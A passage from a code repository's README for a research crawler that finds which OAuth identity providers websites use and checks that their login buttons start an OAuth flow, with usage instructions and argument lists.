295 | addons = [
296 | PathConfString()
297 | ]
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # IdPs Identification
2 |
3 | Crawls a list of websites to search for the OAuth IdPs they use.
4 |
5 | ## How does it work
6 |
7 | On a high level, the script does the following:
8 |
9 | 1. Visit the homepage of the site
10 | 2. If the homepage does not contain the login functionalities:
11 | 1. Crawl the site to find the login page.
12 | 3. Search the OAuth URLs and buttons on the login page.
13 |
14 | ### Login pages identification
15 |
16 | To detect a login page, the script looks for the following:
17 |
18 | - Searches for links that contain some keywords (e.g., `/signin`, `/login`).
19 | - Checks if the current page contains an input field of type `password`.
20 |
21 | ### OAuth URLs and buttons identification
22 |
23 | To detect the OAuth URLs and buttons, the script looks for the following:
24 |
25 | For each **provider**:
26 |
27 | - Search for links containing the **provider** name and some keywords (e.g., `auth`, `login`, `signin').
28 | - Searches for specific HTML tags (`a`, `input`, and `button`) that contain the **provider** name and some keywords (e.g., `auth`, `login`, `signin').
29 | - If a tag is not found, it optionally searches through all the other HTML tags
30 |
31 | **Note**: the script makes heavy use of **denylists** to avoid false positives. The denylists are compiled by observing the results of the script while debugging and are not exhaustive.
32 |
33 | ## How to run it
34 |
35 | - Install the dependencies: `pip install -r requirements.txt`
36 |
37 | ### On a single website
38 |
39 | Run the script: `python3 idps-identification.py -t `
40 |
41 | E.g.:
42 | `python3 idps-identification.py -t imdb.com`
43 | `python3 idps-identification.py -t medium.com`
44 |
45 | #### Script arguments
46 |
47 | ```bash
48 | -h, --help show this help message and exit
49 | -t TARGET, --target TARGET
50 | Target website
51 | -S STATS, --stats STATS
52 | Statistics folder
53 | -R REPORTS, --reports REPORTS
54 | Reports folder
55 | -l LOGS, --logs LOGS Logs folder
56 | -L LINKS, --links LINKS
57 | File containing the login links
58 | -m MAX, --max MAX Maximum number of URLs to crawl (Default: 10)
59 | -N, --no-headless Do not use a headless browser
60 | -r, --retest Retest the URLs
61 | ```
62 |
63 | ### On a list of websites
64 |
65 | 1) Obtain the list of sites:
66 | On the Tranco site, it is possible to download the most recent list of the Top 1 million websites: . The script expects to receive a list of sites with the same Tranco list format, although a slice of the list (e.g. first 30 sites) could be provided to the script.
67 |
68 | 2) Run the script: `python3 launcher.py --sites `
69 |
70 | The launcher will test the websites in the file concurrently (up to the maximum number of concurrent tests).
71 |
72 | #### Launcher arguments
73 |
74 | ```bash
75 | -h, --help show this help message and exit
76 | -s SITES, --sites SITES
77 | Sites list
78 | -m MAX, --max MAX Maximum number of sites to test concurrently (default: 5)
79 | -a ARGUMENTS, --arguments ARGUMENTS
80 | Additional arguments to pass to the crawler (use with = sign: -a="--arg1 --arg2")
81 | -t, --testall Test also already tested sites
82 | -c CRAWLER, --crawler CRAWLER
83 | Alternative crawler script name to launch
84 | -d, --debug Enable debug mode
85 | ```
86 |
87 | ### Workflow
88 |
89 | The structure of the output JSON file of the `idps-identification.py` script differs from the one needed for the next step of **OAuth trigger evaluation**; therefore, we need to convert the JSON file to the correct format. To do so, we use the `convert.sh` script with the same list of sites used before to identify the OAuth triggers.
90 |
91 | Run the script: `/convert.sh `
92 |
93 | The sites file list that is provided to the convert.sh script should follow the same format csv of the Tranco List.
94 |
95 | The script:
96 |
97 | 1. Calls `generate-sites-files.py` to generate the single JSON files with the structure needed by the next step
98 |
99 | 2. Calls `merge-sites-files.py` to merge the single JSON files into a single one (json/sites.json).
100 |
101 | ## Notice
102 |
103 | The script has a high number of false-positives rates. In our research, this has not been a problem since this was only the first step and, in the next one, we used an automated browser to click on the buttons detected by this script to check whether they are OAuth buttons or not. In this script, we prioritized not missing any OAuth button, even if this means having many false positives. Improving the denylists to reduce the false-positives rate is recommended if this script is used for other purposes.
104 |
105 |
106 | # OAuth trigger validation
107 |
108 | Receives a list of the site's login pages and verifies the OAuth button identified to verify they can initiate an OAuth flow.
109 | The results are the list of the site's OAuth trigger evaluated (Verified_Sites.json) and the list of TOP IdPs(Top_Idps.json).
110 |
111 | ## How does it work
112 |
113 | On a high level, the script does the following:
114 |
115 | 1) surf over the login page of the site and one by one exercise the OAuth trigger identified previously
116 | 2) the script looks for changes in the browser, such as a new tab opening or a change of the page URL
117 | 3) if the change occurs, it evaluates the landing page and searches for login page identifier as the presence of the login button and OAuth identifiers in the page URL
118 |
119 | Output:
120 | The output folder contains a series of files with the result for each error type. In the script folder, the file Verified_Sites.json will include the site's login pages with the OAuth trigger correctly functioning and the file Top_Idps.json will contain the list of most used IdPs among the sites inspected.
121 |
122 | ## How to run it
123 |
124 | 1) Install NodeJS from https://nodejs.org/en/download/.
125 | Then, run the following command to install all the dependencies:
126 |
127 | `npm install chrome-launcher chrome-remote-interface url-parse until tldjs path argparse puppeteer fs``
128 |
129 | Adjust the Chrome executable path in verifysites.js at line 81 to point to the Chrome executable file
130 | Run the script: `python3 Start-SitesVerification.py